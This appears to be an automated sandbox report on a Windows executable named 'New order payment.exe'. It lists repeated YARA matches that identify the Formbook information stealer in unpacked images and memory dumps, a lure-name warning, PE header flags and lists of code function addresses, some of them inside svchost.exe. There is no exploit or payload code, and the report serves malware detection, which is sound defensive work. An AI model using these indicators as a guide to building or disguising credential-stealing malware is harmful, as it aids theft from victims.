          Source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: New order payment.exe
          Executable has a suspicious name (potential lure to open the executable)
          Source: New order payment.exe | Static file information: Suspicious name
          Source: New order payment.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_004047D3
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_004061D4
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_73223070
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 0_2_732230BA
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041D0F5
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041C0FC
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041B8B6
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041C985
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041C3AF
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00408C6B
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00408C70
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041BD45
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0041A6B6
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0099B090
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A520A8
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009B20A0
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A528EC
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A5E824
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A41002
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009AA830
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0098F900
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009A4120
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A522AE
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A3FA2B
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009BEBB0
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009BABD8
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A4DBD2
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A403DA
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A52B28
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009AAB40
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0099841F
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A4D466
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_009B2581
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A525DD
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_0099D5E0
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A52D07
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00980D20
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A51D55
          Source: C:\Users\user\Desktop\New order payment.exe | Code function: 1_2_00A52EF7
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A6E30
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4D616
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A51FF1
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5DFCE
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041D0F5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041C0FC
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041B8B6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041C985
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041C3AF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00408C6B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00408C70
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041BD45
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041A6B6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E03DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038EDBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385ABD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F2B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F22AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038DFA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03844120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F20A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F28EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E1002
